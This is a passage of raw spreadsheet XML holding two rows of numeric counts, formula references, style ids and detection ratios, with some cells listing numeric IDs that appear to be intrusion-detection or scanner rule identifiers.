      <c r="GP21" s="113" t="str">
        <f t="shared" si="47"/>
        <v>-</v>
      </c>
      <c r="GQ21" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GR21" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GS21" s="142" t="s">
        <v>225</v>
      </c>
      <c r="GT21" s="94" t="s">
        <v>536</v>
      </c>
      <c r="GU21" s="116" t="s">
        <v>537</v>
      </c>
      <c r="GV21" s="116">
        <v>102.0</v>
      </c>
      <c r="GW21" s="116">
        <v>6286.0</v>
      </c>
      <c r="GX21" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY21" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ21" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA21" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB21" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC21" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD21" s="131" t="s">
        <v>537</v>
      </c>
      <c r="HE21" s="131" t="s">
        <v>537</v>
      </c>
      <c r="HF21" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG21" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH21" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI21" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ21" s="94" t="s">
        <v>538</v>
      </c>
      <c r="HK21" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL21" s="93">
        <v>160.0</v>
      </c>
      <c r="HM21" s="93">
        <f t="shared" si="52"/>
        <v>159</v>
      </c>
      <c r="HN21" s="93">
        <v>159.0</v>
      </c>
      <c r="HO21" s="93">
        <v>0.0</v>
      </c>
      <c r="HP21" s="93">
        <v>159.0</v>
      </c>
      <c r="HQ21" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR21" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS21" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT21" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU21" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV21" s="119" t="s">
        <v>539</v>
      </c>
      <c r="HW21" s="119">
        <v>74.0</v>
      </c>
      <c r="HX21" s="119">
        <v>7336.0</v>
      </c>
      <c r="HY21" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ21" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA21" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB21" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC21" s="120" t="str">
        <f t="shared" si="72"/>
        <v>9999, 30092, 30120, 30323, 30350, 30444, 30510, 30514, 30520, 30798, 30815, 30818, 30844, 30851, 30852, 30853, 30888, 30903, 30914, 30921, 31476, 31477, 31932, 32190, 32194, 32451, 32622, 32658, 32672, 32688, 32689, 32691, 32696, 32701, 32703, 32712, 33327, 33330, 33339, 33467, 33645, 33756, 33779, 33783, 34200, 34439, 34519, 34804, 35010, 35107, 35298, 36096, 36102, 36280, 36315, 38402, 38531, 39455, 39766, 39810, 54469, 54701, 55558, 55834, 58209, 58461, 58618, 90136, 91328, 91655, 92485, 93646, 94328, 94849</v>
      </c>
      <c r="ID21" s="120" t="s">
        <v>539</v>
      </c>
      <c r="IE21" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF21" s="120"/>
      <c r="IG21" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH21" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II21" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ21" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK21" s="99">
        <v>158.0</v>
      </c>
      <c r="IL21" s="99">
        <v>157.0</v>
      </c>
      <c r="IM21" s="121">
        <f t="shared" si="57"/>
        <v>157</v>
      </c>
      <c r="IN21" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO21" s="98">
        <v>157.0</v>
      </c>
      <c r="IP21" s="123">
        <f t="shared" si="58"/>
        <v>0.9874213836</v>
      </c>
      <c r="IQ21" s="118">
        <f t="shared" si="59"/>
        <v>0.9874213836</v>
      </c>
      <c r="IR21" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS21" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT21" s="127"/>
      <c r="IU21" s="127"/>
      <c r="IV21" s="127"/>
      <c r="IW21" s="127"/>
      <c r="IX21" s="127"/>
      <c r="IY21" s="127"/>
      <c r="IZ21" s="127"/>
      <c r="JA21" s="127"/>
      <c r="JB21" s="127"/>
      <c r="JC21" s="127"/>
      <c r="JD21" s="127"/>
      <c r="JE21" s="127"/>
      <c r="JF21" s="127"/>
      <c r="JG21" s="127"/>
      <c r="JH21" s="127"/>
      <c r="JI21" s="127"/>
      <c r="JJ21" s="127"/>
      <c r="JK21" s="127"/>
      <c r="JL21" s="127"/>
      <c r="JM21" s="127"/>
      <c r="JN21" s="127"/>
      <c r="JO21" s="127"/>
      <c r="JP21" s="127"/>
      <c r="JQ21" s="127"/>
      <c r="JR21" s="127"/>
      <c r="JS21" s="127"/>
      <c r="JT21" s="127"/>
      <c r="JU21" s="127"/>
      <c r="JV21" s="127"/>
      <c r="JW21" s="127"/>
      <c r="JX21" s="127"/>
      <c r="JY21" s="127"/>
      <c r="JZ21" s="127"/>
      <c r="KA21" s="127"/>
      <c r="KB21" s="127"/>
      <c r="KC21" s="127"/>
      <c r="KD21" s="127"/>
      <c r="KE21" s="127"/>
      <c r="KF21" s="127"/>
      <c r="KG21" s="127"/>
      <c r="KH21" s="127"/>
      <c r="KI21" s="127"/>
      <c r="KJ21" s="127"/>
      <c r="KK21" s="127"/>
      <c r="KL21" s="127"/>
      <c r="KM21" s="127"/>
      <c r="KN21" s="127"/>
      <c r="KO21" s="127"/>
      <c r="KP21" s="127"/>
      <c r="KQ21" s="127"/>
      <c r="KR21" s="127"/>
      <c r="KS21" s="127"/>
      <c r="KT21" s="127"/>
      <c r="KU21" s="127"/>
      <c r="KV21" s="127"/>
      <c r="KW21" s="127"/>
      <c r="KX21" s="127"/>
      <c r="KY21" s="127"/>
      <c r="KZ21" s="127"/>
      <c r="LA21" s="127"/>
      <c r="LB21" s="127"/>
      <c r="LC21" s="127"/>
      <c r="LD21" s="127"/>
      <c r="LE21" s="127"/>
      <c r="LF21" s="127"/>
      <c r="LG21" s="127"/>
      <c r="LH21" s="127"/>
      <c r="LI21" s="127"/>
      <c r="LJ21" s="127"/>
      <c r="LK21" s="127"/>
      <c r="LL21" s="127"/>
      <c r="LM21" s="127"/>
      <c r="LN21" s="127"/>
      <c r="LO21" s="127"/>
      <c r="LP21" s="127"/>
      <c r="LQ21" s="127"/>
      <c r="LR21" s="127"/>
      <c r="LS21" s="127"/>
      <c r="LT21" s="127"/>
      <c r="LU21" s="127"/>
      <c r="LV21" s="127"/>
      <c r="LW21" s="127"/>
      <c r="LX21" s="127"/>
      <c r="LY21" s="127"/>
      <c r="LZ21" s="127"/>
      <c r="MA21" s="127"/>
      <c r="MB21" s="127"/>
      <c r="MC21" s="127"/>
      <c r="MD21" s="127"/>
      <c r="ME21" s="127"/>
      <c r="MF21" s="127"/>
      <c r="MG21" s="127"/>
      <c r="MH21" s="127"/>
      <c r="MI21" s="127"/>
      <c r="MJ21" s="127"/>
      <c r="MK21" s="127"/>
      <c r="ML21" s="127"/>
      <c r="MM21" s="127"/>
      <c r="MN21" s="127"/>
      <c r="MO21" s="127"/>
      <c r="MP21" s="127"/>
      <c r="MQ21" s="127"/>
      <c r="MR21" s="127"/>
      <c r="MS21" s="127"/>
      <c r="MT21" s="127"/>
      <c r="MU21" s="127"/>
      <c r="MV21" s="127"/>
      <c r="MW21" s="127"/>
      <c r="MX21" s="127"/>
      <c r="MY21" s="127"/>
      <c r="MZ21" s="127"/>
      <c r="NA21" s="127"/>
      <c r="NB21" s="127"/>
      <c r="NC21" s="127"/>
      <c r="ND21" s="127"/>
      <c r="NE21" s="127"/>
      <c r="NF21" s="127"/>
      <c r="NG21" s="127"/>
      <c r="NH21" s="127"/>
      <c r="NI21" s="127"/>
      <c r="NJ21" s="127"/>
      <c r="NK21" s="127"/>
      <c r="NL21" s="127"/>
      <c r="NM21" s="127"/>
      <c r="NN21" s="127"/>
      <c r="NO21" s="127"/>
      <c r="NP21" s="127"/>
      <c r="NQ21" s="127"/>
      <c r="NR21" s="127"/>
      <c r="NS21" s="127"/>
      <c r="NT21" s="127"/>
      <c r="NU21" s="127"/>
      <c r="NV21" s="127"/>
      <c r="NW21" s="127"/>
      <c r="NX21" s="127"/>
      <c r="NY21" s="127"/>
    </row>
    <row r="22" ht="153.75" customHeight="1">
      <c r="B22" s="89" t="s">
        <v>310</v>
      </c>
      <c r="C22" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D22" s="90" t="s">
        <v>311</v>
      </c>
      <c r="E22" s="90" t="s">
        <v>505</v>
      </c>
      <c r="F22" s="90" t="s">
        <v>506</v>
      </c>
      <c r="G22" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H22" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I22" s="92" t="s">
        <v>522</v>
      </c>
      <c r="J22" s="92" t="s">
        <v>315</v>
      </c>
      <c r="K22" s="92" t="s">
        <v>540</v>
      </c>
      <c r="L22" s="93" t="s">
        <v>12</v>
      </c>
      <c r="M22" s="93">
        <v>65681.0</v>
      </c>
      <c r="N22" s="93">
        <v>65680.0</v>
      </c>
      <c r="O22" s="93">
        <v>0.0</v>
      </c>
      <c r="P22" s="93">
        <v>65737.0</v>
      </c>
      <c r="Q22" s="93">
        <f t="shared" si="70"/>
        <v>65737</v>
      </c>
      <c r="R22" s="93">
        <v>65737.0</v>
      </c>
      <c r="S22" s="93">
        <v>0.0</v>
      </c>
      <c r="T22" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U22" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V22" s="96" t="s">
        <v>525</v>
      </c>
      <c r="W22" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X22" s="97" t="s">
        <v>526</v>
      </c>
      <c r="Y22" s="96" t="s">
        <v>527</v>
      </c>
      <c r="Z22" s="96" t="s">
        <v>528</v>
      </c>
      <c r="AA22" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB22" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC22" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD22" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE22" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF22" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AG22" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH22" s="99" t="s">
        <v>529</v>
      </c>
      <c r="AI22" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ22" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK22" s="100" t="s">
        <v>541</v>
      </c>
      <c r="AL22" s="100">
        <v>10.0</v>
      </c>
      <c r="AM22" s="100">
        <v>10.0</v>
      </c>
      <c r="AN22" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO22" s="100" t="s">
        <v>542</v>
      </c>
      <c r="AP22" s="100">
        <v>10.0</v>
      </c>
      <c r="AQ22" s="100">
        <v>10.0</v>
      </c>
      <c r="AR22" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS22" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT22" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU22" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV22" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW22" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX22" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY22" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ22" s="100">
        <v>0.0</v>
      </c>
      <c r="BA22" s="102">
        <v>65683.0</v>
      </c>
      <c r="BB22" s="102">
        <v>3.0</v>
      </c>
      <c r="BC22" s="102">
        <v>8.0</v>
      </c>
      <c r="BD22" s="102">
        <v>10.0</v>
      </c>
      <c r="BE22" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BF22" s="102">
        <v>0.0</v>
      </c>
      <c r="BG22" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BH22" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BI22" s="102">
        <v>3.0</v>
      </c>
      <c r="BJ22" s="102">
        <v>8.0</v>
      </c>
      <c r="BK22" s="102">
        <v>10.0</v>
      </c>
      <c r="BL22" s="103">
        <f t="shared" si="3"/>
        <v>0.00004567600487</v>
      </c>
      <c r="BM22" s="103">
        <f t="shared" si="4"/>
        <v>0.00004567600487</v>
      </c>
      <c r="BN22" s="103" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="BO22" s="103">
        <f t="shared" si="6"/>
        <v>0.0001216970656</v>
      </c>
      <c r="BP22" s="103">
        <f t="shared" si="7"/>
        <v>0.0001216970656</v>
      </c>
      <c r="BQ22" s="103" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="BR22" s="103">
        <f t="shared" si="9"/>
        <v>0.000152121332</v>
      </c>
      <c r="BS22" s="103">
        <f t="shared" si="10"/>
        <v>0.000152121332</v>
      </c>
      <c r="BT22" s="103" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
      <c r="BU22" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BV22" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BW22" s="104" t="s">
        <v>543</v>
      </c>
      <c r="BX22" s="104">
        <v>21.0</v>
      </c>
      <c r="BY22" s="104">
        <v>27.0</v>
      </c>
      <c r="BZ22" s="101" t="s">
        <v>327</v>
      </c>
      <c r="CA22" s="104" t="s">
        <v>544</v>
      </c>
      <c r="CB22" s="104">
        <v>18.0</v>
      </c>
      <c r="CC22" s="104">
        <v>23.0</v>
      </c>
      <c r="CD22" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE22" s="104" t="s">
        <v>327</v>
      </c>
      <c r="CF22" s="104" t="str">
        <f t="shared" ref="CF22:CF34" si="73">IF(CD22="-",CE22,CD22)</f>
        <v>2010937, 2002910, 2010935</v>
      </c>
      <c r="CG22" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH22" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI22" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ22" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK22" s="104">
        <v>0.0</v>
      </c>
      <c r="CL22" s="104">
        <v>0.0</v>
      </c>
      <c r="CM22" s="105">
        <v>65680.0</v>
      </c>
      <c r="CN22" s="105">
        <v>16.0</v>
      </c>
      <c r="CO22" s="105">
        <v>21.0</v>
      </c>
      <c r="CP22" s="105">
        <v>10.0</v>
      </c>
      <c r="CQ22" s="105">
        <v>17.0</v>
      </c>
      <c r="CR22" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CS22" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CT22" s="105">
        <v>0.0</v>
      </c>
      <c r="CU22" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CV22" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CW22" s="105">
        <v>12.0</v>
      </c>
      <c r="CX22" s="105">
        <v>17.0</v>
      </c>
      <c r="CY22" s="105">
        <v>10.0</v>
      </c>
      <c r="CZ22" s="105">
        <v>13.0</v>
      </c>
      <c r="DA22" s="105" t="s">
        <v>12</v>
      </c>
      <c r="DB22" s="106">
        <f t="shared" si="15"/>
        <v>0.0002436053593</v>
      </c>
      <c r="DC22" s="106">
        <f t="shared" si="16"/>
        <v>0.0001827040195</v>
      </c>
      <c r="DD22" s="106" t="str">
        <f t="shared" si="17"/>
        <v>-</v>
      </c>
      <c r="DE22" s="106">
        <f t="shared" si="18"/>
        <v>0.0003194547971</v>
      </c>
      <c r="DF22" s="106">
        <f t="shared" si="19"/>
        <v>0.0002586062644</v>
      </c>
      <c r="DG22" s="106" t="str">
        <f t="shared" si="20"/>
        <v>-</v>
      </c>
      <c r="DH22" s="106" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="DI22" s="106" t="str">
        <f t="shared" si="22"/>
        <v>-</v>
      </c>
      <c r="DJ22" s="106" t="str">
        <f t="shared" si="23"/>
        <v>-</v>
      </c>
      <c r="DK22" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DL22" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DM22" s="108" t="s">
        <v>545</v>
      </c>
      <c r="DN22" s="108">
        <v>24.0</v>
      </c>
      <c r="DO22" s="108">
        <v>35.0</v>
      </c>
      <c r="DP22" s="101" t="s">
        <v>546</v>
      </c>
      <c r="DQ22" s="108" t="s">
        <v>547</v>
      </c>
      <c r="DR22" s="108">
        <v>20.0</v>
      </c>
      <c r="DS22" s="108">
        <v>31.0</v>
      </c>
      <c r="DT22" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU22" s="108" t="s">
        <v>546</v>
      </c>
      <c r="DV22" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DW22" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX22" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY22" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ22" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA22" s="108">
        <v>0.0</v>
      </c>
      <c r="EB22" s="108">
        <v>0.0</v>
      </c>
      <c r="EC22" s="109">
        <v>65683.0</v>
      </c>
      <c r="ED22" s="109">
        <v>17.0</v>
      </c>
      <c r="EE22" s="109">
        <v>22.0</v>
      </c>
      <c r="EF22" s="109">
        <v>18.0</v>
      </c>
      <c r="EG22" s="109">
        <v>17.0</v>
      </c>
      <c r="EH22" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EI22" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EJ22" s="109">
        <v>0.0</v>
      </c>
      <c r="EK22" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EL22" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EM22" s="109">
        <v>13.0</v>
      </c>
      <c r="EN22" s="109">
        <v>18.0</v>
      </c>
      <c r="EO22" s="109">
        <v>18.0</v>
      </c>
      <c r="EP22" s="109">
        <v>13.0</v>
      </c>
      <c r="EQ22" s="109" t="s">
        <v>12</v>
      </c>
      <c r="ER22" s="110">
        <f t="shared" si="27"/>
        <v>0.0002588306943</v>
      </c>
      <c r="ES22" s="110">
        <f t="shared" si="28"/>
        <v>0.0001979293544</v>
      </c>
      <c r="ET22" s="110" t="str">
        <f t="shared" si="29"/>
        <v>-</v>
      </c>
      <c r="EU22" s="110">
        <f t="shared" si="30"/>
        <v>0.0003346669303</v>
      </c>
      <c r="EV22" s="110">
        <f t="shared" si="31"/>
        <v>0.0002738183976</v>
      </c>
      <c r="EW22" s="110" t="str">
        <f t="shared" si="32"/>
        <v>-</v>
      </c>
      <c r="EX22" s="110" t="str">
        <f t="shared" si="33"/>
        <v>-</v>
      </c>
      <c r="EY22" s="110" t="str">
        <f t="shared" si="34"/>
        <v>-</v>
      </c>
      <c r="EZ22" s="110" t="str">
        <f t="shared" si="35"/>
        <v>-</v>
      </c>
      <c r="FA22" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FB22" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FC22" s="111" t="s">
        <v>548</v>
      </c>
      <c r="FD22" s="111">
        <v>35.0</v>
      </c>
      <c r="FE22" s="111">
        <v>48.0</v>
      </c>
      <c r="FF22" s="101" t="s">
        <v>549</v>
      </c>
      <c r="FG22" s="111" t="s">
        <v>550</v>
      </c>
      <c r="FH22" s="111">
        <v>24.0</v>
      </c>
      <c r="FI22" s="111">
        <v>35.0</v>
      </c>
      <c r="FJ22" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK22" s="111" t="s">
        <v>549</v>
      </c>
      <c r="FL22" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2100384, 2002752, 2100615, 2009582, 2100469, 2010935, 2100408, 2010937, 2002749, 2002910, 2002911</v>
      </c>
      <c r="FM22" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN22" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO22" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP22" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ22" s="111">
        <v>0.0</v>
      </c>
      <c r="FR22" s="111">
        <v>0.0</v>
      </c>
      <c r="FS22" s="112">
        <v>65680.0</v>
      </c>
      <c r="FT22" s="112">
        <v>19.0</v>
      </c>
      <c r="FU22" s="112">
        <v>24.0</v>
      </c>
      <c r="FV22" s="112">
        <v>18.0</v>
      </c>
      <c r="FW22" s="112">
        <v>30.0</v>
      </c>
      <c r="FX22" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FY22" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FZ22" s="112">
        <v>0.0</v>
      </c>
      <c r="GA22" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GB22" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GC22" s="112">
        <v>13.0</v>
      </c>
      <c r="GD22" s="112">
        <v>18.0</v>
      </c>
      <c r="GE22" s="112">
        <v>18.0</v>
      </c>
      <c r="GF22" s="112">
        <v>17.0</v>
      </c>
      <c r="GG22" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GH22" s="113">
        <f t="shared" si="39"/>
        <v>0.0002892813642</v>
      </c>
      <c r="GI22" s="113">
        <f t="shared" si="40"/>
        <v>0.0001979293544</v>
      </c>
      <c r="GJ22" s="113" t="str">
        <f t="shared" si="41"/>
        <v>-</v>
      </c>
      <c r="GK22" s="113">
        <f t="shared" si="42"/>
        <v>0.0003650911967</v>
      </c>
      <c r="GL22" s="113">
        <f t="shared" si="43"/>
        <v>0.0002738183976</v>
      </c>
      <c r="GM22" s="113" t="str">
        <f t="shared" si="44"/>
        <v>-</v>
      </c>
      <c r="GN22" s="113" t="str">
        <f t="shared" si="45"/>
        <v>-</v>
      </c>
      <c r="GO22" s="113" t="str">
        <f t="shared" si="46"/>
        <v>-</v>
      </c>
      <c r="GP22" s="113" t="str">
        <f t="shared" si="47"/>
        <v>-</v>
      </c>
      <c r="GQ22" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GR22" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GS22" s="142" t="s">
        <v>225</v>
      </c>
      <c r="GT22" s="94" t="s">
        <v>551</v>
      </c>
      <c r="GU22" s="116" t="s">
        <v>552</v>
      </c>
      <c r="GV22" s="116">
        <v>3.0</v>
      </c>
      <c r="GW22" s="116">
        <v>11.0</v>
      </c>
      <c r="GX22" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY22" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ22" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA22" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB22" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC22" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD22" s="131" t="s">
        <v>552</v>
      </c>
      <c r="HE22" s="131" t="s">
        <v>552</v>
      </c>
      <c r="HF22" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG22" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH22" s="116">
        <v>16267.0</v>
      </c>
      <c r="HI22" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ22" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK22" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL22" s="93">
        <v>65420.0</v>
      </c>
      <c r="HM22" s="93">
        <v>13.0</v>
      </c>
      <c r="HN22" s="93">
        <v>11.0</v>
      </c>
      <c r="HO22" s="93">
        <v>3.0</v>
      </c>
      <c r="HP22" s="93">
        <v>13.0</v>
      </c>
      <c r="HQ22" s="118">
        <f t="shared" si="53"/>
        <v>0.0001979293544</v>
      </c>
      <c r="HR22" s="118">
        <f t="shared" si="54"/>
        <v>0.0001979293544</v>
      </c>
      <c r="HS22" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT22" s="139" t="s">
        <v>553</v>
      </c>
      <c r="HU22" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV22" s="119" t="s">
        <v>554</v>
      </c>
      <c r="HW22" s="119">
        <v>4.0</v>
      </c>
      <c r="HX22" s="119">
        <v>7.0</v>
      </c>
      <c r="HY22" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ22" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA22" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB22" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC22" s="120" t="str">
        <f t="shared" si="72"/>
        <v>31914, 32796, 58433, 94317</v>
      </c>
      <c r="ID22" s="120" t="s">
        <v>555</v>
      </c>
      <c r="IE22" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF22" s="120">
        <v>31914.0</v>
      </c>
      <c r="IG22" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH22" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II22" s="99" t="s">
        <v>556</v>
      </c>
      <c r="IJ22" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK22" s="99">
        <v>65467.0</v>
      </c>
      <c r="IL22" s="99">
        <v>10.0</v>
      </c>
      <c r="IM22" s="121">
        <f t="shared" si="57"/>
        <v>65467</v>
      </c>
      <c r="IN22" s="122" t="s">
        <v>557</v>
      </c>
      <c r="IO22" s="122" t="s">
        <v>557</v>
      </c>
      <c r="IP22" s="123">
        <f t="shared" si="58"/>
        <v>0.9967570037</v>
      </c>
      <c r="IQ22" s="118">
        <f t="shared" si="59"/>
        <v>0.9966047503</v>
      </c>
      <c r="IR22" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS22" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT22" s="127"/>
      <c r="IU22" s="127"/>
      <c r="IV22" s="127"/>
      <c r="IW22" s="127"/>
      <c r="IX22" s="127"/>
      <c r="IY22" s="127"/>
      <c r="IZ22" s="127"/>
      <c r="JA22" s="127"/>
      <c r="JB22" s="127"/>
      <c r="JC22" s="127"/>
      <c r="JD22" s="127"/>
      <c r="JE22" s="127"/>
      <c r="JF22" s="127"/>
      <c r="JG22" s="127"/>
      <c r="JH22" s="127"/>
      <c r="JI22" s="127"/>
      <c r="JJ22" s="127"/>
      <c r="JK22" s="127"/>
      <c r="JL22" s="127"/>
      <c r="JM22" s="127"/>
      <c r="JN22" s="127"/>
      <c r="JO22" s="127"/>
      <c r="JP22" s="127"/>
      <c r="JQ22" s="127"/>
      <c r="JR22" s="127"/>
      <c r="JS22" s="127"/>
      <c r="JT22" s="127"/>
      <c r="JU22" s="127"/>
      <c r="JV22" s="127"/>
      <c r="JW22" s="127"/>
      <c r="JX22" s="127"/>
      <c r="JY22" s="127"/>
      <c r="JZ22" s="127"/>
      <c r="KA22" s="127"/>
      <c r="KB22" s="127"/>
      <c r="KC22" s="127"/>
      <c r="KD22" s="127"/>
      <c r="KE22" s="127"/>
      <c r="KF22" s="127"/>
      <c r="KG22" s="127"/>
      <c r="KH22" s="127"/>
      <c r="KI22" s="127"/>
      <c r="KJ22" s="127"/>
      <c r="KK22" s="127"/>
      <c r="KL22" s="127"/>
      <c r="KM22" s="127"/>
      <c r="KN22" s="127"/>
      <c r="KO22" s="127"/>
      <c r="KP22" s="127"/>
      <c r="KQ22" s="127"/>
      <c r="KR22" s="127"/>
      <c r="KS22" s="127"/>
      <c r="KT22" s="127"/>
      <c r="KU22" s="127"/>
      <c r="KV22" s="127"/>
      <c r="KW22" s="127"/>
      <c r="KX22" s="127"/>
      <c r="KY22" s="127"/>
      <c r="KZ22" s="127"/>
      <c r="LA22" s="127"/>
      <c r="LB22" s="127"/>
      <c r="LC22" s="127"/>
      <c r="LD22" s="127"/>
      <c r="LE22" s="127"/>
      <c r="LF22" s="127"/>
      <c r="LG22" s="127"/>
      <c r="LH22" s="127"/>
      <c r="LI22" s="127"/>
      <c r="LJ22" s="127"/>
      <c r="LK22" s="127"/>
      <c r="LL22" s="127"/>
      <c r="LM22" s="127"/>
      <c r="LN22" s="127"/>
      <c r="LO22" s="127"/>
      <c r="LP22" s="127"/>
      <c r="LQ22" s="127"/>
      <c r="LR22" s="127"/>
      <c r="LS22" s="127"/>
      <c r="LT22" s="127"/>
      <c r="LU22" s="127"/>
      <c r="LV22" s="127"/>
      <c r="LW22" s="127"/>
      <c r="LX22" s="127"/>
      <c r="LY22" s="127"/>
      <c r="LZ22" s="127"/>
      <c r="MA22" s="127"/>
      <c r="MB22" s="127"/>
      <c r="MC22" s="127"/>
      <c r="MD22" s="127"/>
      <c r="ME22" s="127"/>
      <c r="MF22" s="127"/>
      <c r="MG22" s="127"/>
      <c r="MH22" s="127"/>
      <c r="MI22" s="127"/>
      <c r="MJ22" s="127"/>
      <c r="MK22" s="127"/>
      <c r="ML22" s="127"/>
      <c r="MM22" s="127"/>
      <c r="MN22" s="127"/>
      <c r="MO22" s="127"/>
      <c r="MP22" s="127"/>
      <c r="MQ22" s="127"/>
      <c r="MR22" s="127"/>
      <c r="MS22" s="127"/>
      <c r="MT22" s="127"/>
      <c r="MU22" s="127"/>
      <c r="MV22" s="127"/>
      <c r="MW22" s="127"/>
